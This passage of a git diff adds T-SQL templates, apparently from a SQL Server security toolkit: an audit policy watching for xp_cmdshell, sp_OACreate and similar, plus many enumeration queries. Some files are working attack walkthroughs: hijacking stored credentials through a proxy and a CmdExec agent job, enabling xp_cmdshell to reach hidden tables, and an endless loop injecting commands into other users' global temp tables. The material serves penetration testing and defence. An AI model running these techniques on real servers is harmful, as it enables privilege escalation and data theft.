Event ID: 33205 + Description: This event applies to the SQL Server Agent and database level changes. Watch for the following: + + msdb.dbo.sp_add_job Watch for potentially malicious ActiveX, cmdexec, and powershell jobs. + "sp_execute_external_script" Watch for cmd.exe and similar calls. + "sp_OACreate" Watch for Sp_oacreate 'wscript.shell’ and similar calls + "sp_addextendedproc" Watch for any usage + "sp_add_trusted_assembly" Watch for unauthorized usage + + NOTE: Make sure to enabled the auditing as shown below. +*/ + + +/* + Create and Enable Audit Policies +*/ +USE master +CREATE SERVER AUDIT DerbyconAudit +TO APPLICATION_LOG +WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE) +ALTER SERVER AUDIT DerbyconAudit +WITH (STATE = ON) + +-- Server: Audit server configuration changes +-- Windows Log: Application +-- Events: 15457 +CREATE SERVER AUDIT SPECIFICATION [Audit_Server_Configuration_Changes] +FOR SERVER AUDIT DerbyconAudit +ADD (AUDIT_CHANGE_GROUP), -- Audit Audit changes +ADD (SERVER_OPERATION_GROUP) -- Audit server changes +WITH (STATE = ON) + +-- DATABASE: Audit common agent job activity +-- Windows Log: Application +-- Events: 33205 +Use msdb +CREATE DATABASE AUDIT SPECIFICATION [Audit_Agent_Jobs] +FOR SERVER AUDIT [DerbyconAudit] +ADD (EXECUTE ON OBJECT::[dbo].[sp_add_job] BY [dbo]) +WITH (STATE = ON) + +-- DATABASE: Audit potentially dangerous procedures +-- Windows Log: Application +-- Events: 33205 +use master +CREATE DATABASE AUDIT SPECIFICATION [Audit_OSCMDEXEC] +FOR SERVER AUDIT [DerbyconAudit] +ADD (EXECUTE ON OBJECT::[dbo].[xp_cmdshell] BY [dbo]), -- Audit xp_cmdshell execution +ADD (EXECUTE ON OBJECT::[dbo].[sp_addextendedproc] BY [dbo]), -- Audit additional of custom extended stored procedures +ADD (EXECUTE ON OBJECT::[dbo].[sp_execute_external_script] BY [dbo]), -- Audit execution of external scripts such as R and Python +ADD (EXECUTE ON OBJECT::[dbo].[Sp_oacreate] BY [dbo]), -- Audit OLE Automation Procedure execution +ADD (SELECT ON OBJECT::[MASTER].[dbo].[sysservers] BY [dbo]), -- Log listing links via sysserver access +ADD (EXECUTE ON OBJECT::[MASTER].[dbo].[sp_linkedservers] BY [dbo]), -- Log listing links via sp_linkedservers +ADD (EXECUTE ON OBJECT::[MASTER].[dbo].[sp_addlinkedserver] BY [dbo]), -- Log linked server creation +ADD (EXECUTE ON OBJECT::[MASTER].[dbo].[sp_addlinkedsrvlogin] BY [dbo]) -- Log linked server user configuration +WITH (STATE = ON) + + +/* + View Audit Policies +*/ + +-- View audits +SELECT * FROM sys.dm_server_audit_status + +-- View server specifications +SELECT audit_id, +a.name as audit_name, +s.name as server_specification_name, +d.audit_action_name, +s.is_state_enabled, +d.is_group, +d.audit_action_id, +s.create_date, +s.modify_date +FROM sys.server_audits AS a +JOIN sys.server_audit_specifications AS s +ON a.audit_guid = s.audit_guid +JOIN sys.server_audit_specification_details AS d +ON s.server_specification_id = d.server_specification_id + +-- View database specifications +SELECT a.audit_id, +a.name as audit_name, +s.name as database_specification_name, +d.audit_action_name, +d.major_id, +OBJECT_NAME(d.major_id) as object, +s.is_state_enabled, +d.is_group, s.create_date, +s.modify_date, +d.audited_result +FROM sys.server_audits AS a +JOIN sys.database_audit_specifications AS s +ON a.audit_guid = s.audit_guid +JOIN sys.database_audit_specification_details AS d +ON s.database_specification_id = d.database_specification_id + + +/* + Remove Audit Policies +*/ + +-- Remove Audit_Server_Configuration_Changes +use master +ALTER SERVER AUDIT SPECIFICATION [Audit_Server_Configuration_Changes] +WITH (STATE = OFF) +DROP SERVER AUDIT SPECIFICATION [Audit_Server_Configuration_Changes] + +-- Remove Audit_OSCMDEXEC +USE master +ALTER DATABASE AUDIT SPECIFICATION [Audit_OSCMDEXEC] +WITH (STATE = OFF) +DROP DATABASE AUDIT SPECIFICATION [Audit_OSCMDEXEC] + +-- Remove Audit_Agent_Jobs +USE msdb +ALTER DATABASE AUDIT SPECIFICATION [Audit_Agent_Jobs] +WITH (STATE = OFF) +DROP DATABASE AUDIT SPECIFICATION [Audit_Agent_Jobs] + +-- Remove DerbyconAudit audit +ALTER SERVER AUDIT DerbyconAudit +WITH (STATE = OFF) +DROP SERVER AUDIT DerbyconAudit diff --git a/templates/tsql/Get-10MostExpensiveQueries.tsql b/templates/tsql/Get-10MostExpensiveQueries.tsql new file mode 100644 index 0000000..5e594b8 --- /dev/null +++ b/templates/tsql/Get-10MostExpensiveQueries.tsql @@ -0,0 +1,23 @@ +-- Top 10 Most expensive queries +-- https://blog.sqlauthority.com/2010/05/14/sql-server-find-most-expensive-queries-using-dmv/ + +SELECT TOP 10 SUBSTRING(qt.TEXT, (qs.statement_start_offset/2)+1, +((CASE qs.statement_end_offset +WHEN -1 THEN DATALENGTH(qt.TEXT) +ELSE qs.statement_end_offset +END - qs.statement_start_offset)/2)+1), +qs.execution_count, +qs.total_logical_reads, qs.last_logical_reads, +qs.total_logical_writes, qs.last_logical_writes, +qs.total_worker_time, +qs.last_worker_time, +qs.total_elapsed_time/1000000 total_elapsed_time_in_S, +qs.last_elapsed_time/1000000 last_elapsed_time_in_S, +qs.last_execution_time, +qp.query_plan +FROM sys.dm_exec_query_stats qs +CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) qt +CROSS APPLY sys.dm_exec_query_plan(qs.plan_handle) qp +ORDER BY qs.total_logical_reads DESC -- logical reads +-- ORDER BY qs.total_logical_writes DESC -- logical writes +-- ORDER BY qs.total_worker_time DESC -- CPU time diff --git a/templates/tsql/Get-AgentCredentialList.tsql b/templates/tsql/Get-AgentCredentialList.tsql new file mode 100644 index 0000000..9507d1a --- /dev/null +++ b/templates/tsql/Get-AgentCredentialList.tsql @@ -0,0 +1,15 @@ +// Get list of credentials used by agent jobs. + +USE msdb; +GO + +SELECT +j.name AS JobName, +s.step_id AS StepID, +s.step_name AS StepName, +c.name AS CredentialName +FROM sysjobs j +JOIN sysjobsteps s ON j.job_id = s.job_id +LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id +WHERE c.name IS NOT NULL +ORDER BY j.name, s.step_id; diff --git a/templates/tsql/Get-AgentJob.sql b/templates/tsql/Get-AgentJob.sql new file mode 100644 index 0000000..dcd3b98 --- /dev/null +++ b/templates/tsql/Get-AgentJob.sql @@ -0,0 +1,18 @@ +-- Script: Get-AgentJob.sql +-- Description: Return a list of agent jobs. +-- Reference: https://msdn.microsoft.com/en-us/library/ms189817.aspx + +SELECT SUSER_SNAME(owner_sid) as [JOB_OWNER], + job.job_id as [JOB_ID], + name as [JOB_NAME], + description as [JOB_DESCRIPTION], + step_name, + command, + enabled, + server, + database_name, + date_created +FROM [msdb].[dbo].[sysjobs] job +INNER JOIN [msdb].[dbo].[sysjobsteps] steps + ON job.job_id = steps.job_id +ORDER BY JOB_OWNER,JOB_NAME \ No newline at end of file diff --git a/templates/tsql/Get-AuditAction.sql b/templates/tsql/Get-AuditAction.sql new file mode 100644 index 0000000..c355859 --- /dev/null +++ b/templates/tsql/Get-AuditAction.sql @@ -0,0 +1,8 @@ +-- Script: Get-AuditAction.sql +-- Requirements: Sysadmin or required SELECT privileges. +-- Description: Returns available audit actions. +-- Reference: https://msdn.microsoft.com/en-us/library/cc280725.aspx + +SELECT DISTINCT action_id,name,class_desc,parent_class_desc,containing_group_name +FROM sys.dm_audit_actions +ORDER BY parent_class_desc,containing_group_name,name diff --git a/templates/tsql/Get-AuditDatabase.sql b/templates/tsql/Get-AuditDatabase.sql new file mode 100644 index 0000000..0c8b684 --- /dev/null +++ b/templates/tsql/Get-AuditDatabase.sql @@ -0,0 +1,20 @@ +-- Script: Get-AuditDatabase.sql +-- Description: Return a list audit database specifications. +-- Reference: https://technet.microsoft.com/en-us/library/ms190227(v=sql.110).aspx + +SELECT a.audit_id, + a.name as audit_name, + s.name as database_specification_name, + d.audit_action_name, + d.major_id, + OBJECT_NAME(d.major_id) as object, + s.is_state_enabled, + d.is_group, + s.create_date, + s.modify_date, + d.audited_result +FROM sys.server_audits AS a +JOIN sys.database_audit_specifications AS s +ON a.audit_guid = s.audit_guid +JOIN sys.database_audit_specification_details AS d +ON s.database_specification_id = d.database_specification_id diff --git a/templates/tsql/Get-AuditServer.sql b/templates/tsql/Get-AuditServer.sql new file mode 100644 index 0000000..cddf37b --- /dev/null +++ b/templates/tsql/Get-AuditServer.sql @@ -0,0 +1,18 @@ +-- Script: Get-AuditServer.sql +-- Description: Return a list audit server specifications. +-- Reference: https://technet.microsoft.com/en-us/library/cc280663(v=sql.105).aspx + +SELECT audit_id, + a.name as audit_name, + s.name as server_specification_name, + d.audit_action_name, + s.is_state_enabled, + d.is_group, + d.audit_action_id, + s.create_date, + s.modify_date +FROM sys.server_audits AS a +JOIN sys.server_audit_specifications AS s +ON a.audit_guid = s.audit_guid +JOIN sys.server_audit_specification_details AS d +ON s.server_specification_id = d.server_specification_id diff --git a/templates/tsql/Get-CachedPlans.sql b/templates/tsql/Get-CachedPlans.sql new file mode 100644 index 0000000..bd29434 --- /dev/null +++ b/templates/tsql/Get-CachedPlans.sql @@ -0,0 +1,10 @@ +-- Script: Get-CachedPlans.sql +-- Requirements: Sysadmin or required SELECT privileges. +-- Description: Returns a row for each query plan that has been cached by SQL Server for faster query execution since the service started. +-- Reference: https://msdn.microsoft.com/en-us/library/ms187404.aspx + +SELECT bucketid,plan_handle,size_in_bytes,cacheobjtype,objtype,dbid,DB_NAME(dbid) as DatabaseName,objectid,OBJECT_NAME(objectid) as ObjectName,refcounts,usecounts,number,encrypted,text +FROM sys.dm_exec_cached_plans AS p +CROSS APPLY sys.dm_exec_sql_text(p.plan_handle) AS t +ORDER BY usecounts DESC + diff --git a/templates/tsql/Get-Column.sql b/templates/tsql/Get-Column.sql new file mode 100644 index 0000000..4f5c250 --- /dev/null +++ b/templates/tsql/Get-Column.sql @@ -0,0 +1,30 @@ +-- Script: Get-Column.sql +-- Description: Get list of columns for the current database. +-- Reference: https://msdn.microsoft.com/en-us/library/ms188348.aspx + +SELECT + @@servername as [INSTANCE_NAME], + t.TABLE_CATALOG AS [DATABASE_NAME], + t.TABLE_SCHEMA AS [SCHEMA_NAME], + t.TABLE_NAME, + CASE + WHEN (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) > 1 THEN 1 ELSE 0 END) = 1 THEN 'GlobalTempTable' + WHEN t.TABLE_NAME LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'LocalTempTable' + WHEN t.TABLE_NAME NOT LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'TableVariable' + ELSE t.TABLE_TYPE + END AS Table_Type, + c.COLUMN_NAME, + c.DATA_TYPE, + st.is_ms_shipped, + st.is_published, + st.is_schema_published, + st.create_date, + st.modify_date AS modified_date +FROM [INFORMATION_SCHEMA].[TABLES] t +JOIN sys.tables st ON t.TABLE_NAME = st.name AND t.TABLE_SCHEMA = OBJECT_SCHEMA_NAME(st.object_id) +JOIN sys.objects s ON st.object_id = s.object_id +LEFT JOIN sys.extended_properties ep ON s.object_id = ep.major_id + AND ep.minor_id = 0 +JOIN [INFORMATION_SCHEMA].[COLUMNS] c ON t.TABLE_NAME = c.TABLE_NAME AND t.TABLE_SCHEMA = c.TABLE_SCHEMA +ORDER BY t.TABLE_CATALOG, t.TABLE_SCHEMA, t.TABLE_NAME, c.ORDINAL_POSITION; + diff --git a/templates/tsql/Get-Credential.sql b/templates/tsql/Get-Credential.sql new file mode 100644 index 0000000..401c40c --- /dev/null +++ b/templates/tsql/Get-Credential.sql @@ -0,0 +1,5 @@ +-- Script: Get-Credential.sql +-- Description: Get list of credentials on the server. +-- Reference: https://msdn.microsoft.com/en-us/ms161950.aspx + +SELECT * FROM [sys].[credentials] \ No newline at end of file diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql new file mode 100644 index 0000000..2b1bb9d --- /dev/null +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -0,0 +1,153 @@ +-- Tested and worked - SQL Server v2014 instance +-- Author: Scott Sutherland @_nullbind (Twitter) + +-- ################################# +-- LAB SETUP SUMMARY +--- ################################# +-- 1. Install local instance +-- 2. Create local OS user named 'testuser'. +-- 3. Log into SQL Server instance as a sysadmin and create credential. + +-- ################################# +-- LAB SETUP SUMMARY +-- ################################# +-- 1. Log into the SQL Server instance as a sysadmin. +-- 2. List credentials. +-- 3. List proxy accounts. +-- 3. Create proxy account and assign privileges to it (if proxy account doesnt exist for credential already). List proxy accounts to confirm addition. +-- 4. Create Agent job that uses the proxy account. +-- 5. Execute a PowerShell, VBscript, JScript, or CMDEXEC Agent Job. These will create processes on the system in that user context. +-- 6. Confirm execution by reviewing history. + +--- ################################# +-- Walk Through Below +--- ################################# + +---------------------------------------------------- +-- Create a new credential named 'MyCredential' for testing (for lab only) +---------------------------------------------------- +CREATE CREDENTIAL [MyCredential] +WITH IDENTITY = 'yourcomputernamehere\testuser', +SECRET = 'P@ssw0rd!'; + +---------------------------------------------------- +-- Get a list of all credentials +---------------------------------------------------- +select * from sys.credentials + +---------------------------------------------------- +-- Get a list proxies +---------------------------------------------------- +USE msdb; +GO + +SELECT + proxy_id, + name AS proxy_name, + credential_id, + enabled +FROM + dbo.sysproxies; +GO + +---------------------------------------------------- +-- Create a Proxy Using the Target Credential (if needed) +---------------------------------------------------- + +USE msdb; +GO + +EXEC sp_add_proxy + @proxy_name = N'MyCredentialProxy', -- Name of the proxy + @credential_name = N'MyCredential'; -- Name of the existing credential + +EXEC sp_grant_proxy_to_subsystem + @proxy_name = N'MyCredentialProxy', + @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem + +---------------------------------------------------- +-- Get a list proxies - again +---------------------------------------------------- +USE msdb; +GO + +SELECT + proxy_id, + name AS proxy_name, + credential_id, + enabled +FROM + dbo.sysproxies; +GO + +---------------------------------------------------- +-- Create the SQL Server Agent Job Configured to use the Proxy Account +---------------------------------------------------- + +USE msdb; +GO + +-- Create the job +EXEC sp_add_job + @job_name = N'WhoAmIJob'; -- Name of the job + +-- Add a job step that uses the proxy to execute the whoami command +EXEC sp_add_jobstep + @job_name = N'WhoAmIJob', + @step_name = N'ExecuteWhoAmI', + @subsystem = N'CmdExec', -- Specifies an Operating System command + @command = N'c:\windows\system32\cmd.exe /c whoami > c:\temp\whoami.txt', -- The OS command to execute + @on_success_action = 1, -- 1 = Quit with success + @on_fail_action = 2, -- 2 = Quit with failure + @proxy_name = N'MyCredentialProxy'; -- The proxy created earlier + +-- Add a schedule to the job (optional, can be manual or scheduled) +EXEC sp_add_jobschedule + @job_name = N'WhoAmIJob', + @name = N'RunOnce', + @freq_type = 1, -- 1 = Once + @active_start_date = 20240820, -- Start date (YYYYMMDD) + @active_start_time = 120000; -- Start time (HHMMSS) + +-- Add the job to the SQL Server Agent +EXEC sp_add_jobserver + @job_name = N'WhoAmIJob', + @server_name = N'(LOCAL)'; -- The server where the job will run + +---------------------------------------------------- +-- Get List of Proxy Account used by Agent Jobs +-- Show job, step, proxy, cred, and identity +---------------------------------------------------- + +USE msdb; +GO + +SELECT + jobs.name AS JobName, + steps.step_id AS StepID, + steps.step_name AS StepName, + proxies.name AS ProxyName, + ISNULL(credentials.name, 'No Credential') AS CredentialName, + ISNULL(credentials.credential_identity, 'No Identity') AS IdentityName +FROM + msdb.dbo.sysjobs AS jobs +JOIN + msdb.dbo.sysjobsteps AS steps ON jobs.job_id = steps.job_id +JOIN + msdb.dbo.sysproxies AS proxies ON steps.proxy_id = proxies.proxy_id +LEFT JOIN + sys.credentials AS credentials ON proxies.credential_id = credentials.credential_id +WHERE + steps.proxy_id IS NOT NULL +ORDER BY + jobs.name, steps.step_id; + +-------------------------- +-- Execute the Job +-------------------------- +EXEC sp_start_job @job_name = N'WhoAmIJob'; + +-------------------------- +-- Check the Output/Error +-------------------------- +EXEC sp_help_jobhistory @job_name= N'WhoAmIJob'; diff --git a/templates/tsql/Get-CurrentLogin.sql b/templates/tsql/Get-CurrentLogin.sql new file mode 100644 index 0000000..64df0c6 --- /dev/null +++ b/templates/tsql/Get-CurrentLogin.sql @@ -0,0 +1,4 @@ +-- Script: Get-CurrentLogin +-- Description: Returns the current login, and login used to login. +-- Reference: https://msdn.microsoft.com/en-us/library/ms189492.aspx +SELECT SYSTEM_USER as [CURRENT_LOGIN],ORIGINAL_LOGIN() as [ORIGINAL_LOGIN] \ No newline at end of file diff --git a/templates/tsql/Get-DACQuery.sql b/templates/tsql/Get-DACQuery.sql new file mode 100644 index 0000000..d3de16c --- /dev/null +++ b/templates/tsql/Get-DACQuery.sql @@ -0,0 +1,31 @@ +-- Making a DAC connection via SQLi or direct connection using ad-hoc queries + +-- Verify that we don't have access to hidden SQL Server system tables - returns msg 208 "Invalid object name 'sys.sysrscols'." + +SELECT * FROM sys.sysrscols + +-- Enabled ad hoc queries (disabled by default) +-- Note: Changing this configuration requires sysadmin privileges. +-- Note: For sqli this can be placed into a stored procedure or binary encoded+executed with exec + +sp_configure 'Ad Hoc Distributed Queries',1 +reconfigure +go + +-- Make a DAC connection via ad hoc query - tada! + +SELECT a.* FROM OPENROWSET('SQLNCLI', 'Server=ADMIN:SQLSERVER1\INSTANCE2014;Trusted_Connection=yes;','SELECT * FROM sys.sysrscols') AS a; + +Note: This could also be done with database links. Lots of potential for this one - Enjoy! + +-- Alternatively, you could just use xp_cmdshell to pass through to sqlcmd, osql, or isql, but the output isn't quite as nice. + +sp_configure 'show advanced options',1 +reconfigure +go + +sp_configure 'xp_cmdshell',1 +reconfigure +go + +xp_cmdshell 'sqlcmd -E -S "ADMIN:SQLSERVER1\INSTANCE2014" -Q "SELECT * FROM sys.sysrscols"' diff --git a/templates/tsql/Get-Database.sql b/templates/tsql/Get-Database.sql new file mode 100644 index 0000000..8e31bcc --- /dev/null +++ b/templates/tsql/Get-Database.sql @@ -0,0 +1,26 @@ +-- Script: Get-Database.sql +-- Description: This will return viewable databases and some associated meta data. +-- Filename may not be returned if the current user is not a sysadmin. +-- If the "VIEW ANY DATABASE" privilege has been revoked from Public +-- then some databases may not be listed if the current user is not a sysadmin. +-- Reference: https://msdn.microsoft.com/en-us/library/ms178534.aspx +-- TODO: Fix is_encrypted column - should only show on versions =>10 + +SELECT @@SERVERNAME as [Instance], + a.database_id as [DatabaseId], + a.name as [DatabaseName], + SUSER_SNAME(a.owner_sid) as [DatabaseOwner], + IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid)) as [OwnerIsSysadmin], + a.is_trustworthy_on, + a.is_db_chaining_on, + a.is_broker_enabled, + a.is_encrypted, + a.is_read_only, + a.create_date, + a.recovery_model_desc, + b.filename as [FileName], + (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2)) from sys.master_files where name like a.name) as [DbSizeMb], + HAS_DBACCESS(a.name) as [has_dbaccess] +FROM [sys].[databases] a +INNER JOIN [sys].[sysdatabases] b +ON a.database_id = b.dbid diff --git a/templates/tsql/Get-DatabaseAudit.sql b/templates/tsql/Get-DatabaseAudit.sql new file mode 100644 index 0000000..c04531b --- /dev/null +++ b/templates/tsql/Get-DatabaseAudit.sql @@ -0,0 +1,10 @@ +-- Script: Get-DatabaseAudit.sql +-- Requirements: Sysadmin or required SELECT privileges. +-- Description: Returns database audit specifications. +-- Reference: https://msdn.microsoft.com/en-us/library/cc280726.aspx + +SELECT * FROM sys.server_audits AS a +JOIN sys.database_audit_specifications AS s +ON a.audit_guid = s.audit_guid +JOIN sys.database_audit_specification_details AS d +ON s.database_specification_id = d.database_specification_id diff --git a/templates/tsql/Get-DatabasePriv.sql b/templates/tsql/Get-DatabasePriv.sql new file mode 100644 index 0000000..d14654c --- /dev/null +++ b/templates/tsql/Get-DatabasePriv.sql @@ -0,0 +1,27 @@ +-- Script: Get-DatabasePriv.sql +-- Description: This script will return all of the database user +-- privileges for the current database. +-- Reference: http://msdn.microsoft.com/en-us/library/ms188367.aspx +-- Note: This line below will also show full privs for sysadmin users +-- SELECT * FROM fn_my_permissions(NULL, 'DATABASE'); +-- http://stackoverflow.com/questions/410396/public-role-access-in-sql-server + +SELECT DISTINCT rp.name, + ObjectType = rp.type_desc, + PermissionType = pm.class_desc, + pm.permission_name, + pm.state_desc, + ObjectType = CASE + WHEN obj.type_desc IS NULL + OR obj.type_desc = 'SYSTEM_TABLE' THEN + pm.class_desc + ELSE obj.type_desc + END, + [ObjectName] = Isnull(ss.name, Object_name(pm.major_id)) +FROM sys.database_principals rp + INNER JOIN sys.database_permissions pm + ON pm.grantee_principal_id = rp.principal_id + LEFT JOIN sys.schemas ss + ON pm.major_id = ss.schema_id + LEFT JOIN sys.objects obj + ON pm.[major_id] = obj.[object_id] diff --git a/templates/tsql/Get-DatabaseRole.sql b/templates/tsql/Get-DatabaseRole.sql new file mode 100644 index 0000000..9b1df4c --- /dev/null +++ b/templates/tsql/Get-DatabaseRole.sql @@ -0,0 +1,15 @@ +-- Script: Get-DatabaseRole.sql +-- Description: This script with return database +-- users and roles for current database. +-- Reference: https://msdn.microsoft.com/en-us/library/ms187328.aspx + +SELECT db_name() AS [DatabaseName], + a.name AS [PrincipalName], + a.type_desc AS [PrincipalType], + USER_NAME(b.role_principal_id) AS [DatabaseRole], + a.is_fixed_role [is_fixed_role] +FROM [sys].[database_principals] a +LEFT OUTER JOIN [sys].[database_role_members] b +ON a.principal_id = b.member_principal_id +WHERE a.sid IS NOT NULL +ORDER BY [DatabaseName] diff --git a/templates/tsql/Get-DatabaseUser.sql b/templates/tsql/Get-DatabaseUser.sql new file mode 100644 index 0000000..3c7fcda --- /dev/null +++ b/templates/tsql/Get-DatabaseUser.sql @@ -0,0 +1,20 @@ +-- Script: Get-DatabaseUser.sql +-- Description: Get list of users for the current database. To view all +-- users you may need to be a sysadmin. Unless bruteforced. +-- Reference: https://msdn.microsoft.com/en-us/library/ms187328.aspx +-- Join Ref: http://blog.sqlauthority.com/2009/04/13/sql-server-introduction-to-joins-basic-of-joins/ + +SELECT + a.principal_id, + a.name as [database_user], + b.name as [sql_login], + a.type, + a.type_desc, + default_schema_name, + a.sid, + a.create_date, + a.is_fixed_role +FROM [sys].[database_principals] a +LEFT JOIN [sys].[server_principals] b + ON a.sid = b.sid +ORDER BY principal_id diff --git a/templates/tsql/Get-Domain.sql b/templates/tsql/Get-Domain.sql new file mode 100644 index 0000000..ad3cc52 --- /dev/null +++ b/templates/tsql/Get-Domain.sql @@ -0,0 +1,5 @@ +-- Script: Get-Domain.sql +-- Description: Returns the default domain of the SQL Server. +-- Reference: http://www.sanssql.com/2008/11/find-domain-name-using-t-sql.html + +SELECT DEFAULT_DOMAIN() as [DEFAULT_DOMAIN] \ No newline at end of file diff --git a/templates/tsql/Get-Endpoint.sql b/templates/tsql/Get-Endpoint.sql new file mode 100644 index 0000000..accbe84 --- /dev/null +++ b/templates/tsql/Get-Endpoint.sql @@ -0,0 +1,5 @@ +-- Script: Get-EndPoint.sql +-- Description: Get list of available endpoints. +-- Reference: https://msdn.microsoft.com/en-us/library/ms189746.aspx + +SELECT * FROm [sys].[endpoints] \ No newline at end of file diff --git a/templates/tsql/Get-FQDN.sql b/templates/tsql/Get-FQDN.sql new file mode 100644 index 0000000..fe01076 --- /dev/null +++ b/templates/tsql/Get-FQDN.sql @@ -0,0 +1,12 @@ +-- Requires sysadmin + +-- option 1 +DECLARE @Domain NVARCHAR(100) +EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\services\Tcpip\Parameters', N'Domain',@Domain OUTPUT +SELECT Cast(SERVERPROPERTY('MachineName') as nvarchar) + '.' + @Domain AS FQDN + + +-- option 2 +DECLARE @Domain NVARCHAR(100) +EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Control\Lsa\CachedMachineNames', N'NameUserPrincipal',@Domain OUTPUT +SELECT @Domain AS FQDN diff --git a/templates/tsql/Get-GlobalTempTable-RaceUpdateExample.sql b/templates/tsql/Get-GlobalTempTable-RaceUpdateExample.sql new file mode 100644 index 0000000..a7fb689 --- /dev/null +++ b/templates/tsql/Get-GlobalTempTable-RaceUpdateExample.sql @@ -0,0 +1,83 @@ +------------------------------------------------------- +-- Script: Get-GlobalTempTable-RaceUpdate +-- Author: Scott Sutherland +-- Description: +-- Update contents of all global temp tables using +-- user defined code, this can be useful for exploiting +-- some race conditions. +------------------------------------------------------- + +------------------------------------------------------ +-- Example 1: Known Table, Known Column +------------------------------------------------------ + +-- Loop forever +WHILE 1=1 +BEGIN + -- Update table contents with custom powershell script + -- In real world, use the path below, because it is writable by the restricted SQL Server service account, and c:\windows\temp\ is not. + -- DECLARE @SQLerrorlogDir VARCHAR(256);SELECT @SQLerrorlogDir = master.dbo.fn_SQLServerErrorLogDir() + DECLARE @mycommand varchar(max) + SET @mycommand = 'UPDATE t1 SET t1.PSCode = ''whoami > c:\windows\temp\finishline.txt'' FROM ##temp123 t1' + EXEC(@mycommand) +END + +------------------------------------------------------ +-- Example 2: Unknown Table, Known Column +------------------------------------------------------ + +-- Create variables +DECLARE @PsFileName NVARCHAR(4000) +DECLARE @TargetDirectory NVARCHAR(4000) +DECLARE @PsFilePath NVARCHAR(4000) + +-- Set filename for PowerShell script +Set @PsFileName = 'finishline.txt' + +-- Set target directory for PowerShell script to be written to +SELECT @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY('ErrorLogFileName')) as VARCHAR(MAX)),'ERRORLOG','') + +-- Create full output path for creating the PowerShell script +SELECT @PsFilePath = @TargetDirectory + @PsFileName + +-- Loop forever +WHILE 1=1 +BEGIN + -- Set delay + WAITFOR DELAY '0:0:1' + + -- Setup variables + DECLARE @mytempname varchar(max) + + -- Iterate through all global temp tables + DECLARE MY_CURSOR CURSOR + FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%' + OPEN MY_CURSOR + FETCH NEXT FROM MY_CURSOR INTO @mytempname + WHILE @@FETCH_STATUS = 0 + BEGIN + -- Print table name + PRINT @mytempname + + -- Update contents of known column with ps script in an unknown temp table + DECLARE @mycommand varchar(max) + SET @mycommand = 'UPDATE t1 SET t1.PSCode = ''Write-Output "hello world" | Out-File "' + @PsFilePath + '"'' FROM ' + @mytempname + ' t1' + EXEC(@mycommand) + + -- Select table contents + DECLARE @mycommand2 varchar(max) + SET @mycommand2 = 'SELECT * FROM [' + @mytempname + ']' + EXEC(@mycommand2) + + -- Next record + FETCH NEXT FROM MY_CURSOR INTO @mytempname + END + CLOSE MY_CURSOR + DEALLOCATE MY_CURSOR +END + +------------------------------------------------------ +-- Example 3: Unknown Table, Unkown column +------------------------------------------------------ +-- todo + diff --git a/templates/tsql/Get-GlobalTempTableColumns.sql b/templates/tsql/Get-GlobalTempTableColumns.sql new file mode 100644 index 0000000..ffa050c --- /dev/null +++ b/templates/tsql/Get-GlobalTempTableColumns.sql @@ -0,0 +1,24 @@ +-- Script: Get-GlobalTempTableColumns.sql +-- Description: This can be used to monitor for global temp tables and their columns as a least privilege user. +-- Author: Scott Sutherland + +-- Loop +While 1=1 +BEGIN + + -- List global temp tables, columns, and column types + SELECT t1.name as 'Table_Name', + t2.name as 'Column_Name', + t3.name as 'Column_Type', + t1.create_date, + t1.modify_date, + t1.parent_object_id + FROM tempdb.sys.objects AS t1 + JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID + JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id + WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1 + + -- Set delay + WaitFor Delay '00:00:01' + +END diff --git a/templates/tsql/Get-GlobalTempTableData.sql b/templates/tsql/Get-GlobalTempTableData.sql new file mode 100644 index 0000000..8aa142d --- /dev/null +++ b/templates/tsql/Get-GlobalTempTableData.sql @@ -0,0 +1,82 @@ +-- Script: Get-GlobalTempTableData.sql +-- Author: Scott Sutherland +-- Description: Monitor for global temp tables. +-- Sometimes they're used to store sensitive data +-- or code that may be executed in another user's context. + +------------------------------------------ +-- List All Global Temp Tables +------------------------------------------ + +SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%' + +------------------------------------------ +-- View Contents of All Global Temp Tables +------------------------------------------ + +-- Setup variables +DECLARE @mytempname varchar(max) +DECLARE @psmyscript varchar(max) + +-- Iterate through all global temp tables +DECLARE MY_CURSOR CURSOR + FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%' +OPEN MY_CURSOR +FETCH NEXT FROM MY_CURSOR INTO @mytempname +WHILE @@FETCH_STATUS = 0 +BEGIN + + -- Print table name + PRINT @mytempname + + -- Select table contents + DECLARE @myname varchar(max) + SET @myname = 'SELECT * FROM [' + @mytempname + ']' + EXEC(@myname) + + -- Next + FETCH NEXT FROM MY_CURSOR INTO @mytempname +END +CLOSE MY_CURSOR +DEALLOCATE MY_CURSOR + +------------------------------------------ +-- Monitor content of All Global Temp Tables +-- in a Loop +-- Note: Make sure to manage this one +-- carefully so you dont start the server +-- on fire. :) +------------------------------------------ + +While 1=1 +BEGIN + -- Add delay if required + -- waitfor delay '0:0:2' + + -- Setup variables + DECLARE @mytempname varchar(max) + DECLARE @psmyscript varchar(max) + + -- Iterate through all global temp tables + DECLARE MY_CURSOR CURSOR + FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%' + OPEN MY_CURSOR + FETCH NEXT FROM MY_CURSOR INTO 